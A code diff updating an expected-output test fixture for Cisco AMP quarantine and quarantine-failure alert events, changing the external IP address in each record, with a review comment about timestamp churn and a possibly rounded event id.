- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763941700Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2499,7 +2499,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2540,7 +2540,7 @@
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
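Review bot: The `event.ingested` value is rewritten in this hunk and in every sibling hunk that carries an `original` string (-2550, -2622, -2694, -2766, -2838, -2914, -2990, -3066, -3167, -3270) even though only the `external_ip` literal was meant to change, so each regeneration of this expected file will keep producing the same spurious timestamp diffs. If the package's pipeline test config does not already exclude `event.ingested` as a dynamic field, adding that exclusion would make the fixture change only when pipeline output changes; the config is not visible in this diff, so this may already be in place. Separately, and pre-existing rather than introduced here, the new `original` string carries `\"id\":6419303574240494000` next to `\"detection_id\":\"6419303574240493594\"`, which looks like a 64-bit identifier that was already rounded through a double before the fixture was captured, so this expected output cannot detect that precision loss and the raw API value may differ.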
@@ -2550,8 +2550,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025274907Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763946600Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2571,7 +2571,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2612,7 +2612,7 @@
 "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2622,8 +2622,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025277130Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763952200Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2643,7 +2643,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2684,7 +2684,7 @@
 "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2694,8 +2694,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025279336Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763957400Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2715,7 +2715,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2756,7 +2756,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2766,8 +2766,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025281853Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763963800Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2787,7 +2787,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2828,7 +2828,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2838,8 +2838,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025284137Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763969900Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -2859,7 +2859,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2904,7 +2904,7 @@
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2914,8 +2914,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025286500Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763975900Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -2935,7 +2935,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2980,7 +2980,7 @@
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2990,8 +2990,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025288757Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763980600Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -3011,7 +3011,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -3056,7 +3056,7 @@
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -3066,8 +3066,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025291244Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763984300Z",
